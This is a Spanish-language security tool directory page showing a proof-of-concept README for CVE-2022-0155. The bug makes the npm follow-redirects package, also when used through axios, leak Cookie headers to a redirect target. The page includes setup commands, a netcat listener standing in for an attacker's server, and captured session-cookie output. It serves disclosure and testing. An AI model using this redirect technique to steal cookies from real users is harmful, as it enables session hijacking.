Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-0155-PoC — Prueba de concepto que demuestra el robo de cookies CVE-2022-0155 mediante redirección HTTP en el paquete npm follow-redirects, incluyendo scripts de servidor Express y cliente para probar ataques de dependencias transitivas. | Kitploit
Herramientas/GitHubGitHub/coana-tech/cve-2022-0155-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónSeguridad WebPruebas de Penetración
GitHubcoana-tech/cve-2022-0155-poc

CVE-2022-0155-PoC

Prueba de concepto que demuestra el robo de cookies CVE-2022-0155 mediante redirección HTTP en el paquete npm follow-redirects, incluyendo scripts de servidor Express y cliente para probar ataques de dependencias transitivas.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
1hace 2 añosAún no revisado
Compartir

Prueba de concepto (PoC) de CVE-2022-0155

Este repositorio contiene una demostración de la vulnerabilidad CVE-2022-0155. La vulnerabilidad fue detectada por ranjit-git y se describe en detalle aquí. El propósito de esta PoC es demostrar que la vulnerabilidad no solo se aplica a escenarios donde follow-redirects se usa como dependencia directa, sino también cuando follow-redirects se usa como dependencia indirecta/transitiva a través de axios.

Resumen

La vulnerabilidad afecta al paquete npm follow-redirects anterior a la versión 1.14.7. Follow-redirects extiende el módulo HTTP integrado con la capacidad de seguir redirecciones.

Para demostrar la vulnerabilidad, considere el siguiente escenario:

  1. follow-redirects se utiliza para enviar una solicitud GET a https://example.com.
  2. https://example.com responde con un código de respuesta 3xx solicitando una redirección a https://attackers-webserver.com.
  3. follow-redirects envía entonces una solicitud GET a https://attackers-webserver.com.

La vulnerabilidad se encuentra en el paso 3, donde las versiones vulnerables de follow-redirects incluyen los mismos encabezados que la solicitud del paso 1. Esto permite que robe, por ejemplo, el ID de sesión del usuario en y obtenga acceso a los datos del usuario.

Cookie
https://attackers-webserver.com
https://example.com

El ataque depende de la capacidad del atacante para controlar la redirección a https://attackers-webserver.com. En la PoC, se utiliza un servidor Express para emular el comportamiento de https://example.com. El servidor tiene un único endpoint de API GET '/redirect', que redirige al cliente a la URL proporcionada como parámetro. Esto emula un escenario en el que el atacante puede controlar la URL a la que se redirige al cliente.

PoC

root@kitploit:~
npm install
node express-server.js
nc -l -v 8182 # or nc -lnvp 8182 on non-mac systems
node client.js 

Debería ver que la terminal que contiene nc imprime esta salida:

root@kitploit:~
GET / HTTP/1.1
Accept: application/json, text/plain, */*
Cookie: session=some-secret-value
User-Agent: axios/0.21.4
Host: localhost:8182
Connection: keep-alive

La vulnerabilidad se ilustra con la presencia del encabezado Cookie en la terminal de nc, ya que el servidor nc (Netcat) se utiliza para representar el servidor web del atacante.

Descargar herramienta